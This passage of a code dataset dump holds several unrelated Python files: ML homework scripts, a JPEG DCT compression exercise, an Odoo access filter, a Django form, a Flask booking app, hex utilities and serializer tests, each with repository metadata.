{}\".format(list(loss.size()))\n print(\"Sanity Check Passed for Question 2b: CharDecoder.train_forward()!\")\n print(\"-\"*80)\n\ndef question_2c_sanity_check(decoder):\n \"\"\" Sanity check for 
CharDecoder.decode_greedy()\n basic shape check\n \"\"\"\n print (\"-\"*80)\n print(\"Running Sanity Check for Question 2c: CharDecoder.decode_greedy()\")\n print (\"-\"*80)\n sequence_length = 4\n inpt = torch.zeros(1, BATCH_SIZE, HIDDEN_SIZE, dtype=torch.float)\n initialStates = (inpt, inpt)\n device = decoder.char_output_projection.weight.device\n decodedWords = decoder.decode_greedy(initialStates, device)\n assert(len(decodedWords) == BATCH_SIZE), \"Length of decodedWords should be {} but is: {}\".format(BATCH_SIZE, len(decodedWords))\n print(\"Sanity Check Passed for Question 2c: CharDecoder.decode_greedy()!\")\n print(\"-\"*80)\n\ndef main():\n \"\"\" Main func.\n \"\"\"\n args = docopt(__doc__)\n\n # Check Python & PyTorch Versions\n assert (sys.version_info >= (3, 5)), \"Please update your installation of Python to version >= 3.5\"\n assert(torch.__version__ >= \"1.0.0\"), \"Please update your installation of PyTorch. You have {} and you should have version 1.0.0\".format(torch.__version__)\n\n # Seed the Random Number Generators\n seed = 1234\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n np.random.seed(seed * 13 // 7)\n\n vocab = Vocab.load('./sanity_check_en_es_data/vocab_sanity_check.json')\n\n # Create NMT Model\n model = NMT(\n word_embed_size=EMBED_SIZE,\n hidden_size=HIDDEN_SIZE,\n dropout_rate=DROPOUT_RATE,\n vocab=vocab)\n\n char_vocab = DummyVocab()\n\n # Initialize CharDecoder\n decoder = CharDecoder(\n hidden_size=HIDDEN_SIZE,\n char_embedding_size=EMBED_SIZE,\n target_vocab=char_vocab)\n\n if args['1e']:\n question_1e_sanity_check()\n elif args['1f']:\n question_1f_sanity_check(EMBED_SIZE,BATCH_SIZE)\n elif args['1g']:\n question_1g_sanity_check()\n elif args['1h']:\n question_1h_sanity_check(model)\n elif args['2a']:\n question_2a_sanity_check(decoder, char_vocab)\n elif args['2b']:\n question_2b_sanity_check(decoder)\n elif args['2c']:\n question_2c_sanity_check(decoder)\n else:\n raise RuntimeError('invalid run mode')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cs224n/a5/sanity_check.py","file_name":"sanity_check.py","file_ext":"py","file_size_in_byte":9768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"143338165","text":"# -*- coding: utf-8 -*-\nimport cv2\nimport numpy as np\n\n\n# DCT hyoer-parameter\nT = 8\nK = 4\n\n# DCT weight\ndef w(x, y, u, v):\n cu = 1.\n cv = 1.\n if u == 0:\n cu /= np.sqrt(2.)\n if v == 0:\n cv /= np.sqrt(2.)\n return (2*cu*cv/T) * (np.cos((2*x+1)*u*np.pi/2/T)) * (np.cos((2*y+1)*v*np.pi/2/T))\n\n\n# DCT\ndef dct(img):\n F = np.zeros((H, W, channel), dtype=np.float32)\n for c in range(channel):\n for yi in range(0, H, T):\n for xi in range(0, W, T): # crop the image into 8 X 8\n for v in range(0, T):\n for u in range(0, T): # each(u, v) in K space represent a cosine wave\n for y in range(0, T):\n for x in range(0, T): # each cosine wave contribute to the entire image\n F[v+yi, u+xi, c] += img[y+yi, x+xi, c] * w(x,y,u,v)\n return F\n\n# IDCT\ndef idct(F):\n out = np.zeros((H, W, channel), dtype=np.float32)\n for c in range(channel):\n for yi in range(0, H, T):\n for xi in range(0, W, T): # crop the image into 8 X 8\n for y in range(0, T):\n for x in range(0, T): # each(u, v) in K space represent a cosine wave\n for v in range(0, K):\n for u in range(0, K): # each cosine wave contribute to the entire image\n out[y+yi, x+xi, c] += F[v+yi, u+xi, c] * w(x,y,u,v)\n \n # clipping\n out = np.clip(out, 0, 255)\n out = out.astype(np.uint8)\n\n return out\n\n# MSE\ndef 
MSE(img, out):\n mse = np.sum((img - out) ** 2) / (H * W * channel)\n return mse\n\n# PSNR\ndef PSNR(mse, vmax=255):\n return 10 * np.log10(vmax * vmax / mse)\n\n# bitrate\ndef BITRATE():\n return 1. * T * K * K / T / T\n\n# BGR2YCbCr\ndef BGR2YCbCr(img):\n out = np.zeros([H, W, channel], dtype=np.float32)\n B = img[:, :, 0]\n G = img[:, :, 1]\n R = img[:, :, 2]\n \n Y = 0.2990 * R + 0.5870 * G + 0.1140 * B\n Cb = -0.1687 * R - 0.3313 * G + 0.5 * B + 128\n Cr = 0.5 * R - 0.4187 * G - 0.0813 * B + 128\n out[:, :, 0] = Y\n out[:, :, 1] = Cb\n out[:, :, 2] = Cr\n\n return out\n\n# YCbCr2BGR\ndef YCbCr2BGR(img_):\n out = np.zeros([H, W, channel], dtype=np.float32)\n out[..., 2] = img_[..., 0] + (img_[..., 2] - 128.) * 1.4020\n out[..., 1] = img_[..., 0] - (img_[..., 1] - 128.) * 0.3441 - (img_[..., 2] - 128.) * 0.7139\n out[..., 0] = img_[..., 0] + (img_[..., 1] - 128.) * 1.7718\n \n # clipping\n out = np.clip(out, 0, 255)\n out = out.astype(np.uint8)\n\n return out\n\ndef quantization(F):\n \n Q1 = np.array(((16, 11, 10, 16, 24, 40, 51, 61),\n (12, 12, 14, 19, 26, 58, 60, 55),\n (14, 13, 16, 24, 40, 57, 69, 56),\n (14, 17, 22, 29, 51, 87, 80, 62),\n (18, 22, 37, 56, 68, 109, 103, 77),\n (24, 35, 55, 64, 81, 104, 113, 92),\n (49, 64, 78, 87, 103, 121, 120, 101),\n (72, 92, 95, 98, 112, 100, 103, 99)), dtype=np.float32)\n \n Q2 = np.array(((17, 18, 24, 47, 99, 99, 99, 99),\n (18, 21, 26, 66, 99, 99, 99, 99),\n (24, 26, 56, 99, 99, 99, 99, 99),\n (47, 66, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99),\n (99, 99, 99, 99, 99, 99, 99, 99)), dtype=np.float32)\n \n Q = Q1\n for c in range(channel):\n if c > 0:\n Q = Q2\n for ys in range(0, H, T):\n for xs in range(0, W, T):\n F[ys: ys + T, xs: xs + T,c] = np.round(F[ys: ys + T, xs: xs + T, c] / Q) * Q\n \n return F\n\n\n# Read image\nimg = cv2.imread(\"imori.jpg\").astype(np.float32)\nH, W, channel = img.shape\n\n# BGR2YCbCr\nimg_ = BGR2YCbCr(img)\n\n# DCT\nF = dct(img_)\n\n# quantization\nF_ = quantization(F)\n\n# IDCT\nout_ = idct(F_)\n\n# YCbCr2BGR\nout = YCbCr2BGR(out_)\n\n# MSE\nmse = MSE(img, out)\n\n# PSNR\npsnr = PSNR(mse)\n\n# bitrate\nbitrate = BITRATE()\n\nprint(\"MSE:\", mse)\nprint(\"PSNR:\", psnr)\nprint(\"bitrate:\", bitrate)\n\n# Save result\ncv2.namedWindow(\"result\", 0)\ncv2.resizeWindow(\"result\", 256, 256)\n\ncv2.imshow(\"result\", out)\ncv2.waitKey(0)\n\ncv2.imwrite(\"Myresult/out40.jpg\", out)\n\ncv2.destroyAllWindows()\n","sub_path":"Question_31_40/JPEG Compression(Step4) YCbCr+DCT+Quantization.py","file_name":"JPEG Compression(Step4) YCbCr+DCT+Quantization.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"629420770","text":"from torch.utils.data import Dataset\nimport numpy as np\nimport cv2\nimport os\nimport torch\nimport csv\nimport time\nimport utility\nimport params\n\n\nclass chiDataSet(Dataset):\n def __init__(self, converter: utility.strLabelConverter, img_root, label_path,\n roi_config: utility.roi_controller, statistical_para, transforms=None):\n super(chiDataSet, self).__init__()\n self.img_root = img_root\n self.converter = converter\n self.transforms = transforms\n self.rois = roi_config.rois\n self.gt_col = roi_config.gt_cols\n self.statistical_para = statistical_para\n self.labels = self.get_labels(label_path)\n\n def get_labels(self, label_path):\n img_files = os.listdir(self.img_root + 'pos_imgs')\n update_flag = False\n with 
open(label_path, 'r', encoding='utf-8-sig') as file:\n reader = csv.reader(file)\n labels = []\n for c in reader:\n if ('pos_' + c[0] + '.jpg') not in img_files:\n continue\n label = []\n for index in self.gt_col:\n if index == params.addr_c:\n label.append(c[index].lower()[0:24])\n elif index == params.police_c:\n label.append(c[index].lower())\n elif index == params.date_c:\n label.append(c[index].lower().replace('.', '').replace('-', ''))\n else:\n label.append(c[index].lower())\n for item in c[index].lower():\n if item not in self.converter.dict.keys():\n update_flag = True\n self.converter.dict[item] = len(self.converter.dict) + 1\n self.converter.alphabet += item\n labels.append({c[0]: label})\n if update_flag:\n t = time.strftime('%Y_%m_%d_%H_%M', time.localtime())\n torch.save(self.converter.dict, 'dict_' + t)\n return labels\n\n def __len__(self):\n return len(self.labels)\n\n def preprocessing(self, image):\n image = image.astype(np.float32) / 255.\n image = torch.from_numpy(image).type(torch.FloatTensor)\n image.sub_(self.statistical_para[0]).div_(self.statistical_para[1])\n return image\n\n def __getitem__(self, index):\n image_name = list(self.labels[index].keys())[0]\n label = list(self.labels[index].values())[0]\n images = []\n image_pos = cv2.imread(self.img_root + 'pos_imgs/pos_' + image_name + '.jpg', 0)\n image_neg = cv2.imread(self.img_root + 'neg_imgs/neg_' + image_name + '.jpg', 0)\n for i in range(len(self.rois)):\n roi = self.rois[i]\n if self.gt_col[0] not in [9, 10]:\n images.append(image_pos[roi[0]:roi[1], roi[2]:roi[3]])\n else:\n images.append(image_neg[roi[0]:roi[1], roi[2]:roi[3]])\n if images[i].shape[0] != 32:\n raise RuntimeError('img height should be 32')\n images_stack = np.hstack(images)\n cv2.imshow(\"img\", images_stack)\n images_stack = images_stack.reshape(32, images_stack.shape[1], 1).transpose(2, 0, 1)\n images_stack = self.preprocessing(images_stack)\n cv2.waitKey(0)\n return images_stack, label[0]\n","sub_path":"dataset_for_chinese.py","file_name":"dataset_for_chinese.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"66581825","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Ursa Information Systems\n# Author: Sandip Mangukiya ()\n# Bhavesh Odedra ()\n# Copyright (C) 2015 ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n##############################################################################\n\nfrom openerp.osv import fields, osv\nfrom openerp.tools.translate import _\n\n\nclass sale_order(osv.osv):\n _inherit = \"sale.order\"\n _description = \"Sales Order\"\n \n def search_read(self, cr, uid, domain=None, fields=None, offset=0, limit=None, order=None, context=None):\n if self.pool['res.users'].has_group(cr, uid, 'base.group_sale_salesman_all_leads_special'):\n #Find House User\n house_user_ids = self.pool.get('res.users').search(cr, uid, [('name','ilike','GIW House Account')], context=context)\n house_user_ids.append(uid)\n domain.append(['user_id','in',house_user_ids])\n res = super(sale_order, self).search_read(cr, uid, domain=domain, offset=offset, limit=limit, order=order, context=context)\n return res\n\n def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False,lazy=True):\n if self.pool['res.users'].has_group(cr, uid, 'base.group_sale_salesman_all_leads_special'):\n #Find House User\n house_user_ids = self.pool.get('res.users').search(cr, uid, [('name','ilike','GIW House Account')], context=context)\n house_user_ids.append(uid)\n domain.append(['user_id','in',house_user_ids])\n return super(sale_order, self).read_group(cr, uid, domain, fields, groupby, offset, limit, context, orderby,lazy)\n","sub_path":"ursa_house_account_access/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"144050282","text":"#!/usr/bin/env python\nimport _init_paths\nfrom load_probs_and_calc_stats import load_probs_and_calc_stats\nimport os.path as osp\n\n\nif __name__ == '__main__':\n\n probs_len = 10572\n max_orig_label = 10244\n\n\n # image path: osp.join(image_dir, )\n prob_dir = r'/home/asian_probs_on_sphere64_webface/corr_prob'\n image_list_file = r'/disk2/zhaoyafei/face-recog-train/train-val-lists/asian/face_asian_train_list_noval_10245-ids_540735-objs_170818-225846-norootdir.txt'\n\n # save_dir = None\n save_dir = '../../prob-results/asian_probs_on_sphere64_webface/corr_prob_stats'\n\n num_images = -1 # <0, means all images\n\n load_probs_and_calc_stats(prob_dir, probs_len,\n max_orig_label,\n image_list_file, num_images,\n save_dir)","sub_path":"scripts/load_probs_and_calc_stats/test_scripts_corr_prob/test_asian_probs_on_sphere64_webface.py","file_name":"test_asian_probs_on_sphere64_webface.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"75901602","text":"from django.forms import ModelForm\r\nfrom django import forms\r\nfrom django.core.validators import MinLengthValidator\r\n\r\nfrom .models import Item\r\n\r\nclass ItemCreateForm(ModelForm):\r\n \r\n class Meta:\r\n model = Item\r\n fields = (\"item\",)\r\n\r\n item = forms.CharField(\r\n label = \"Name\",\r\n max_length=30, \r\n validators=[MinLengthValidator(3)],\r\n error_messages={\r\n 'min_length': (\"Name must be longer than 2 characters\")}\r\n )\r\n \r\n\r\n def save(self, commit=True):\r\n item = super(ItemCreateForm, self).save(commit=False)\r\n\r\n if commit:\r\n item.save()\r\n return item\r\n","sub_path":"apps/main/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"265408991","text":"from flask import Flask, render_template, 
request, redirect, flash\nimport csv\nimport time\n\napp = Flask(__name__)\napp.secret_key = 'some_secret'\n\n@app.route('/')\ndef home():\n aboutUs = readFile(\"static/aboutUs.txt\")\n onSite = readCSV(\"static/onsite.csv\")\n offSite = readCSV(\"static/offsite.csv\")\n comments = readCSV(\"static/comments.csv\")\n allBookings = readCSV(\"static/bookings.csv\")\n bookingDates = readAllDatesBooked(allBookings)\n return render_template('home.html', aboutUsText=aboutUs, onSiteList=onSite, offSiteList=offSite,\n commentsList=comments, bookings=bookingDates)\n\n\ndef readFile(fileName):\n with open(fileName) as fileContent:\n return fileContent.readlines()\n\n\ndef readCSV(fileName):\n with open(fileName, 'r') as inFile:\n reader = csv.reader(inFile)\n theList = [row for row in reader]\n return theList\n\n\ndef addToCSV(item1, item2, item3, fileName):\n fileContents = readCSV(fileName)\n fileContents.append([item1, item2, item3])\n with open(fileName, 'w') as outFile:\n writer = csv.writer(outFile)\n writer.writerows(fileContents)\n return\n\ndef readAllDatesBooked(bookings):\n return bookings\n\n@app.route('/addReview', methods=['POST'])\ndef addReview():\n name = request.form['fullName']\n comment = request.form['comment']\n date = time.strftime(\"%x\")\n print(name)\n print(comment)\n print(date)\n addToCSV(name, date, comment, \"static/comments.csv\")\n return redirect('/')\n\n\n@app.route('/makeBooking', methods=['POST'])\ndef makeBooking():\n name = request.form['name']\n date = request.form['date']\n email = request.form['email']\n if name == \"\":\n flash(\"Please enter details to submit a booking request\")\n return redirect('/')\n if checkBookings(date) == 1:\n addToCSV(name, date, email, \"static/bookings.csv\")\n flash(\"Booking for \" + date + \" has been successfully made\")\n else:\n flash(\"Villa is not available on this date, please try again\")\n return redirect('/')\n\n\ndef checkBookings(date):\n bookings = readCSV(\"static/bookings.csv\")\n for booking in bookings:\n if booking[1] == date:\n return 0\n return 1\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"599650972","text":"\ndef hex4(value):\n value = hex(value).upper()[2:]\n value = value.rjust(4,'0')\n return value\n\ndef hex2(value):\n value = hex(value).upper()[2:]\n value = value.rjust(2,'0')\n return value\n\ndef dump_bytes(b):\n ret = ''\n b = list(b) \n for i in b:\n ret+=hex2(i)+' ' \n return ret.strip()\n\ndef hexlist(b):\n ret = '['\n for i in b:\n ret+=hex2(i)+', '\n ret = ret[0:-2] + ']'\n return ret\n\ndef indent_code(s,level):\n # code goes out to column 65\n if s[4]!= ':':\n return s\n \n i = s.find(';')\n \n if i>=0: \n comment = s[i+1:].strip()\n code = s[6:i].strip()\n return s[0:6]+code.rjust(len(code)+level*2).ljust(65)+'; '+comment.rjust(len(comment)+level*2)\n else:\n code = s[6:].strip()\n return s[0:6]+code.rjust(len(code)+level*2)\n","sub_path":"computerarcheology/util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"372991711","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport autoslug.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0012_auto_20151111_0959'),\n ]\n\n 
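# The operation below redefines 'slug' as a non-editable AutoSlugField\n    # populated from 'title' and kept unique together with 'pub_date'.\n    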
operations = [\n migrations.AlterField(\n model_name='news',\n name='slug',\n field=autoslug.fields.AutoSlugField(editable=False, unique_with=(b'pub_date',), populate_from=b'title', max_length=40, verbose_name=b'Slug'),\n ),\n ]\n","sub_path":"news/migrations/0013_auto_20151111_1001.py","file_name":"0013_auto_20151111_1001.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"48118365","text":"def numpy2hJ(h,J):\n hout = [i for i in h]\n Jout={}\n (row,col)=J.shape\n for i in range(row):\n for j in range(col):\n if J[i,j]!=0:\n Jout.update({(i,j):float(J[i,j])})\n return hout,Jout\n\ndef adj2sapi(adjMat):\n\t(row,col) = adjMat.shape\n\tJ = []\n\tfor i in range(row):\n\t\tfor j in range(col):\n\t\t\tif adjMat[i,j]!=0:\n\t\t\t\tJ.append((i,j))\n\treturn J\n","sub_path":"src/ri_help.py","file_name":"ri_help.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"416004894","text":"import numpy as np\nimport keras\nfrom keras import layers, optimizers, losses, metrics\nfrom keras.models import Model, Sequential\nfrom keras.datasets import mnist\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nimport struct\nfrom array import array\nfrom os.path import join\nimport random\nimport tensorflow as tf\nimport pandas as pd\nimport os\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import regularizers\nfrom keras import backend as K\nfrom keras.utils import to_categorical\nfrom tensorflow.keras.models import load_model\nimport sys\nfrom sklearn.metrics import classification_report\nfrom classification_functions import MnistDataloader, print_plot, print_correct_incorrect\n\n\nif __name__ == \"__main__\":\n\tif (len(sys.argv) == 11):\n\t\ti = 0\n\t\tfor var in sys.argv:\t\t\t\t\t\t\t\t\t\t# get values from command line\n\t\t\tif (var == \"-d\"):\n\t\t\t\ttraining_images_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-dl\"):\n\t\t\t\ttraining_labels_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-t\"):\n\t\t\t\ttest_images_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-tl\"):\n\t\t\t\ttest_labels_filepath = sys.argv[i + 1]\n\t\t\tif (var == \"-model\"):\n\t\t\t\tmodel = sys.argv[i + 1]\n\t\t\ti = i + 1\n\telse:\n\t\tprint(\"Wrong input. 
Using default values.\")\n\t\ttraining_images_filepath = 'train-images-idx3-ubyte' \t\t# default values if not given by user\n\t\ttraining_labels_filepath = 'train-labels-idx1-ubyte'\n\t\ttest_images_filepath = 't10k-images-idx3-ubyte'\n\t\ttest_labels_filepath = 't10k-labels-idx1-ubyte'\n\t\tmodel = 'autoencoder.h5'\n\n\t(xtrain, ytrain) = MnistDataloader(training_images_filepath, training_labels_filepath)\t# read datasets\n\t(xtest, ytest) = MnistDataloader(test_images_filepath, test_labels_filepath)\n\n\tx_train = np.array(xtrain)\n\tx_test = np.array(xtest)\n\ty_train = np.array(ytrain)\n\ty_test = np.array(ytest)\n\n\tx_train = x_train.astype('float32') / 255.\t\t\t\t\t\t# values 0/1\n\tx_test = x_test.astype('float32') / 255.\n\n\tx_train = np.reshape(x_train, (len(x_train), 28, 28, 1))\n\tx_test = np.reshape(x_test, (len(x_test), 28, 28, 1))\n\n\ty_train_array = to_categorical(y_train)\t\t\t\t\t\t\t# fix hot\n\ty_test_array = to_categorical(y_test)\n\n\tx_train, xx_test, y_train_array, xy_test_array = train_test_split(x_train, y_train_array, test_size=0.2, random_state=13)\t#split dataset\n\n\tlist_loss = []\n\tlist_val_loss = []\n\tlist_accuracy = []\n\tlist_val_accuracy = []\n\n\tlist_epochs_num = []\n\tlist_batch_sz = []\n\tlist_neurons_fc = []\n\n\twhile (1):\n\t\tnum_classes = 10\n\n\t\tepochs_num = int(input(\"GIVE NUMBER OF EPOCHS: \\n\"))\t\t\t\t\t\t# get values from user\n\t\tbatch_sz = int(input(\"GIVE BATCH SIZE: \\n\"))\n\t\tneurons_fc = int(input(\"GIVE NEURONS AT FC LAYER: \\n\"))\n\n\t\t# epochs_num = 5\n\t\t# batch_sz = 100\n\t\t# neurons_fc = 256\n\n\t\tlist_epochs_num.append(epochs_num)\n\t\tlist_batch_sz.append(batch_sz)\n\t\tlist_neurons_fc.append(neurons_fc)\n\n\t\tnetworkInput = keras.layers.Input(shape=(28, 28, 1), name='input')\n\n\t\tautoencoder_model = load_model(model)\t\t\t\t\t\t\t\t\t\t# load autoencoder model\n\t\tl = (len(autoencoder_model.layers)/2) -1\n\n\t\tflat = keras.layers.Flatten()(autoencoder_model.layers[int(l)].output) # get autoencoder's output and do flatten\n\t\tden = keras.layers.Dense(neurons_fc, activation='relu')(flat)\n\t\toutput = keras.layers.Dense(num_classes, activation='softmax')(den)\n\n\t\tencoder_model = Model(inputs=autoencoder_model.layers[0].output, outputs=output, name='ENCODER')\n\n\t\tprint(\"\\nStage 1:\\n\")\t\t\t\t\t\t\t\t\t\t\t\t\t\t# stage 1: only fully connected layer\n\t\tfor layer in encoder_model.layers[0:int(l)+1]:\n\t\t\tlayer.trainable = False\n\n\t\tencoder_model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\t\tencoder_model.summary()\n\n\t\tclassify_train = encoder_model.fit(x_train, y_train_array, batch_size=batch_sz, epochs=epochs_num, verbose=1, validation_data=(xx_test, xy_test_array))\n\n\t\tprint(\"\\nStage 2:\\n\")\t\t\t\t\t\t\t\t\t\t\t\t\t\t# stage 2: all layers\n\t\tfor layer in encoder_model.layers[0:int(l)+1]:\n\t\t\tlayer.trainable = True\n\n\t\tencoder_model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adam(), metrics=['accuracy'])\n\t\t\n\t\tclassify_train = encoder_model.fit(x_train, y_train_array, batch_size=batch_sz, epochs=epochs_num, verbose=1, validation_data=(xx_test, xy_test_array))\n\n\t\tlast_loss = classify_train.history['loss'][-1]\t\t\t\t\t\t\t\t# get last value to use for plots\n\t\tlast_val_loss = classify_train.history['val_loss'][-1]\n\t\tlast_accuracy = classify_train.history['accuracy'][-1]\n\t\tlast_val_accuracy = 
classify_train.history['val_accuracy'][-1]\n\n\t\tlist_loss.append(last_loss)\n\t\tlist_val_loss.append(last_val_loss)\n\t\tlist_accuracy.append(last_accuracy)\n\t\tlist_val_accuracy.append(last_val_accuracy)\n\n\t\txtrain = np.array(xtrain)\n\t\tytrain = np.array(ytrain)\n\t\t\n\t\txtrain = xtrain.astype('float32') / 255.\t\t\t\t\t\t# values 0/1\n\t\txtrain = np.reshape(xtrain, (len(xtrain), 28, 28, 1))\n\n\t\tval = int(input(\"TO REPEAT THE EXPERIMENT PRESS 1.\\nTO SHOW THE PLOTS PRESS 2.\\nTO CLASSIFY IMAGES PRESS 3.\\n\"))\n\t\tif (val == 1):\n\t\t\tcontinue\n\n\t\telif (val == 2):\n\t\t\tval = int(input(\"TO PRINT EPOCHS PLOT PRESS 0.\\nTO PRINT BATCH_SIZE PLOT PRESS 1.\\nTO PRINT NEURONS_FC PLOT PRESS 2.\\n\"))\n\t\t\tprint_plot(int(val), list_loss, list_val_loss, list_accuracy, list_val_accuracy, list_epochs_num, list_batch_sz, list_neurons_fc)\t# print plots\n\n\t\t\ty_pred = encoder_model.predict(x_test, batch_size=batch_sz, verbose=1)\n\t\t\ty_pred_bool = np.argmax(y_pred, axis=1)\n\t\t\tprint(classification_report(y_test, y_pred_bool))\t\t\t\t\t\t\t\t\t\t# print report\n\n\t\t\tval = int(input(\"TO REPEAT THE EXPERIMENT PRESS 1.\\nTO CLASSIFY IMAGES PRESS 3.\\n\"))\n\t\t\tif (val == 1):\n\t\t\t\tcontinue\n\t\t\telif (val == 3):\n\t\t\t\tpredicted_classes = encoder_model.predict(xtrain)\n\t\t\t\tpredicted_classes = np.argmax(np.round(predicted_classes), axis=1)\n\n\t\t\t\tprint_correct_incorrect(predicted_classes, xtrain, ytrain)\t\t\t\t\t\t\t# print correct and incorrect images\n\n\t\t\t\tclusters = [[] for i in range(10)]\n\t\t\t\tfor i in range(len(xtrain)):\n\t\t\t\t\tclusters[predicted_classes[i]].append(i)\n\n\t\t\t\tf = open(\"classification_results\", \"w\")\n\t\t\t\tfor i in range(len(clusters)):\n\t\t\t\t\tf.write(\"CLUSTER-\" + str(i) + \" { size: \" + str(len(clusters[i])))\n\t\t\t\t\tfor im in clusters[i]:\n\t\t\t\t\t\tf.write(\", \" + str(im))\n\t\t\t\t\tf.write(\"\\n\")\n\t\t\t\tf.close()\n\t\t\t\t\n\t\t\t\tbreak\n\n\t\telif (val == 3):\n\t\t\tpredicted_classes = encoder_model.predict(xtrain)\n\t\t\tpredicted_classes = np.argmax(np.round(predicted_classes), axis=1)\t\n\n\t\t\tprint_correct_incorrect(predicted_classes, xtrain, ytrain)\t\t\t\t\t\t\t\t# print correct and incorrect images\n\n\t\t\tclusters = [[] for i in range(10)]\n\t\t\tfor i in range(len(xtrain)):\n\t\t\t\tclusters[predicted_classes[i]].append(i)\n\n\t\t\tf = open(\"classification_results\", \"w\")\n\t\t\tfor i in range(len(clusters)):\n\t\t\t\tf.write(\"CLUSTER-\" + str(i) + \" ( size: \" + str(len(clusters[i])))\n\t\t\t\tfor im in clusters[i]:\n\t\t\t\t\tf.write(\", \" + str(im))\n\t\t\t\tf.write(\")\\n\")\n\t\t\tf.close()\n\n\t\t\tbreak\n\n\n\n\n\n","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":6814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"587107736","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 25 18:53:52 2020\r\n\r\n@author: MOHANA D\r\n\"\"\"\r\n\r\n#Write a program that calculates and prints the value according to the given formula:\r\n#Q = Square root of [(2 * C * D)/H] Following are the fixed values of C and H: C is 50. \r\n#H is 30. 
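For example, D = 100 gives Q = round(sqrt(2*50*100/30)) = round(18.257) = 18. 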
D is the variable whose values should be input to your program in a comma-separated sequence.\r\n\r\n\r\nimport math\r\n\r\nnumbers = input(\"Provide D: \")\r\nnumbers = numbers.split(',')\r\n\r\nresult_list = []\r\nfor D in numbers:\r\n Q = round(math.sqrt(2 * 50 * int(D) / 30))\r\n result_list.append(Q)\r\n\r\nprint(result_list)\r\n\r\n","sub_path":"dch.py","file_name":"dch.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642300913","text":"import unittest\nfrom os import path, curdir\n\nfrom serializer.serializers.json_serializer import JsonSerializer\nfrom .test_data import data, get_answer_files, get_test_files\n\n\nclass JsonSerializerTestCase(unittest.TestCase):\n def setUp(self):\n self.test_json_ser = JsonSerializer()\n self.path_dir = path.join(\n path.abspath(curdir),\n 'test_serializers',\n 'test_answers',\n 'test_json'\n )\n self.data = data\n self.answer_files = get_answer_files('json')\n self.json_files = get_test_files('json')\n\n def test_dump(self):\n for value, test_json, answer_file in zip( \n self.data[:-4],\n self.json_files[:-4], \n self.answer_files[:-4]):\n self.test_json_ser.dump(\n value, path.join(self.path_dir, test_json))\n with open(path.join(\n self.path_dir, test_json), 'r') as rf:\n result = rf.read()\n with open(path.join(\n self.path_dir, answer_file), 'r') as rf:\n answer = rf.read()\n self.assertEqual(result, answer)\n self.assertIsNone(\n self.test_json_ser.dump(None, self.data[:-1])\n )\n\n def test_dumps(self):\n for value, answer_file in zip(self.data[:-4],\n self.answer_files[:-4]):\n with open(path.join(\n self.path_dir, answer_file), 'r') as rf:\n answer = rf.read()\n self.assertEqual(\n self.test_json_ser.dumps(value), answer\n )\n self.assertIsNone(\n self.test_json_ser.dump(self.data[:-1], self.data[:-1])\n )\n\n def test_load(self):\n for value, test_json in zip(self.data[:-4],\n self.json_files[:-4]):\n self.assertEqual(\n self.test_json_ser.load(path.join(\n self.path_dir, test_json)), value\n )\n func = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[4]),\n convert=True)\n self.assertEqual(type(func), dict)\n simple_class = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[5]))\n self.assertEqual(type(simple_class), type)\n complex_class = self.test_json_ser.load(path.join(\n 